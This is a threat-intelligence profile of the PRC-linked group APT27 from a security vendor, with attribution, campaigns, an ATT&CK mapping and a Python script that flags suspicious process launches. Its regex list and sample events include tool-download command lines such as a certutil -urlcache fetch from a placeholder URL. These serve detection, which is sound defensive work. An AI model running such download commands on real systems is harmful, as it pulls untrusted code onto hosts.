APT27 is a PRC state-sponsored espionage group active since at least 2010, targeting government agencies, defense contractors, and technology companies worldwide. The group is known for its custom tooling including SysUpdate RAT, HyperBro backdoor, and exploitation of web-facing applications for initial access.
| Attribute | Detail |
|---|---|
| Names | APT27 / Emissary Panda / Lucky Mouse |
| Attribution | PRC State-Sponsored |
| Active Since | 2010 |
| Primary Focus | Espionage targeting government, defense, technology. Known for SysUpdate RAT and HyperBro backdoor. |
Attribution
APT27, also tracked as Emissary Panda and Lucky Mouse, is assessed to be PRC state-sponsored and has been active since at least 2010. Its operations centre on espionage against government, defense, and technology organizations, and it is known for the SysUpdate RAT and the HyperBro backdoor.
Notable Campaigns
- Operation Iron Tiger — defense and technology espionage
- Government sector targeting across Asia, Europe, and North America
- Exploitation of SharePoint and Exchange servers for initial access
- HyperBro backdoor deployment campaigns
- Ransomware operations as cover for espionage (2021)
MITRE ATT&CK Mapping
| Technique ID | Technique | Confidence |
|---|---|---|
| T1190 | Exploit Public-Facing Application | High |
| T1059 | Command and Scripting Interpreter | High |
| T1105 | Ingress Tool Transfer | High |
| T1071 | Application Layer Protocol | High |
| T1036 | Masquerading | High |
Detection & Defense
Monitor for the TTPs listed above using your SIEM and EDR platforms, with particular attention to process-creation telemetry from web-facing servers. Prioritize patching of internet-facing applications (SharePoint and Exchange in particular, given this group's history of exploiting them) and enforce MFA on all remote access. Mjolnir Security provides continuous threat hunting and monitoring for APT27 activity patterns.
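As an added illustration of what "monitor for the TTPs listed above" looks like in practice (this is example code written for this page, not Mjolnir Security's tooling or any APT27 artifact), the following rule set scans Windows process-creation events for three of the mapped techniques: a system binary name running outside the system directories (T1036), a command interpreter spawned by a web-server worker process, the typical follow-on of public-facing application exploitation (T1190 leading to T1059), and download utilities in a command line (T1105). The event field names (`image`, `parent_image`, `command_line`) are an assumed generic Sysmon/EDR-style schema, and the sample telemetry is constructed, not real indicators.

```python
"""Rule-based triage of process-creation events for APT27-style TTPs.

Added example for this page; field names and sample events are assumptions.
"""
from __future__ import annotations

import re
from typing import Iterable

# Windows binaries whose names are commonly borrowed by masquerading malware (T1036).
SYSTEM_BINARIES = {"svchost.exe", "lsass.exe", "services.exe", "csrss.exe", "explorer.exe", "winlogon.exe"}
# Directories from which those binaries legitimately execute (compared lower-cased).
LEGIT_SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# Command and scripting interpreters (T1059).
INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Web-server worker processes; an interpreter child is a classic post-exploitation signal (T1190 -> T1059).
WEB_WORKERS = {"w3wp.exe", "httpd.exe", "tomcat.exe"}
# Command-line fragments associated with pulling tooling onto a host (T1105).
INGRESS_PATTERNS = [
    re.compile(p, re.IGNORECASE)
    for p in (
        r"certutil(\.exe)?\s+.*-urlcache",
        r"bitsadmin(\.exe)?\s+.*/transfer",
        r"invoke-webrequest|downloadstring|downloadfile|start-bitstransfer",
        r"\bcurl(\.exe)?\s+.*https?://",
    )
]


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path ('' for empty input)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event: dict) -> list[tuple[str, str]]:
    """Return (technique_id, reason) pairs that fire for one process-creation event."""
    hits: list[tuple[str, str]] = []
    image = event.get("image", "")
    name = _basename(image)
    parent = _basename(event.get("parent_image", ""))
    cmdline = event.get("command_line", "")

    # T1036: a well-known system binary name executing from a non-system directory.
    if name in SYSTEM_BINARIES and not image.lower().startswith(LEGIT_SYSTEM_DIRS):
        hits.append(("T1036", f"{name} executed from non-system path {image}"))
    # T1059 (following T1190): interpreter spawned directly by a web-server worker.
    if parent in WEB_WORKERS and name in INTERPRETERS:
        hits.append(("T1059", f"{name} spawned by web worker {parent}"))
    # T1105: known download utilities or cmdlets in the command line.
    if any(p.search(cmdline) for p in INGRESS_PATTERNS):
        hits.append(("T1105", f"download utility in command line: {cmdline[:80]}"))
    return hits


def scan(events: Iterable[dict]) -> list[dict]:
    """Apply evaluate() to a stream of events and collect alerts in event order."""
    alerts = []
    for ev in events:
        for technique, reason in evaluate(ev):
            alerts.append({"event_id": ev.get("id"), "host": ev.get("host"),
                           "technique": technique, "reason": reason})
    return alerts


# Constructed sample telemetry (hostnames, paths and URL are placeholders, not IoCs).
SAMPLE_EVENTS = [
    {"id": 1, "host": "web01", "image": r"C:\Windows\System32\svchost.exe",
     "parent_image": r"C:\Windows\System32\services.exe", "command_line": "svchost.exe -k netsvcs"},
    {"id": 2, "host": "web01", "image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "parent_image": r"C:\Windows\System32\services.exe", "command_line": "w3wp.exe -ap DefaultAppPool"},
    {"id": 3, "host": "web01", "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\System32\inetsrv\w3wp.exe", "command_line": "cmd.exe /c whoami"},
    {"id": 4, "host": "web01", "image": r"C:\Users\Public\svchost.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe", "command_line": "svchost.exe"},
    {"id": 5, "host": "fs02", "image": r"C:\Windows\System32\certutil.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": "certutil.exe -urlcache -split -f http://example.invalid/a.dat a.dat"},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(f"[{alert['technique']}] host={alert['host']} event={alert['event_id']}: {alert['reason']}")
```

Events 1 and 2 are ordinary service and IIS worker start-ups and produce nothing; events 3, 4 and 5 each raise exactly one alert. In a real deployment the constants would be tuned to the environment (for example, adding application pools that legitimately launch scripts as exclusions), and the alerts would be correlated with the patching and MFA controls above rather than acted on in isolation.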
Mjolnir Security — Threat Intelligence & Response
Mjolnir Security provides 24/7 threat monitoring, incident response, and threat intelligence services. Contact us for threat hunting specifically targeting APT27 TTPs in your environment.
mjolnirsecurity.com — 24/7 Incident Response Hotline: +1 833 403 5875